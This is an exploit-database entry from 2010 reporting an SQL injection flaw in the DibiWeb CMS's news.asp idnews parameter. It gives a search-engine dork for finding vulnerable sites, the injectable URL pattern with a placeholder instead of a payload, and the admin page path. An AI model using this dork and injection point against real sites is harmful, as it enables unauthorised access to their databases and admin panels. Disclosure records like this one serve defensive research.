id: 12528
date: 06/03/2010
title: DibiWeb (News.asp) SQL Injection Vulnerability
author: Ashiyane
cves: 

==============================================
DibiWeb (News.asp) SQL Injection Vulnerability 
==============================================


# Exploit Title: DibiWeb (News.asp) SQL Injection Vulnerability 
# Software Site: http://www.dibiweb.it/
# CVE : N/A
# Author: Ashiyane Digital Security Team         
# Platform / Tested on: Linux

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    |      .|'''.|  '||'  '||' '||' '||' '|'     |     '|.   '|' '||''''|  
   |||     ||..  '   ||    ||   ||    || |      |||     |'|   |   ||  .    
  |  ||     ''|||.   ||''''||   ||     ||      |  ||    | '|. |   ||''|    
 .''''|.  .     '||  ||    ||   ||     ||     .''''|.   |   |||   ||       
,|.  .||. |'....|'   ||.  .||. .||.   .||.  
 ,|.  .||. .|.   '|  .||.....| 
                                                                           
 			
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Dork : " intext:"powered by DibiWeb" "

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Exploit :

http://[site]/path/news.asp?idnews=[sqli]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Admin Page : 

http://[site]/path/admin/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Site:
 Ashiyane.org

Email : mehranphp[at]yahoo[dot]com




#  0day.today [2023-03-24]  #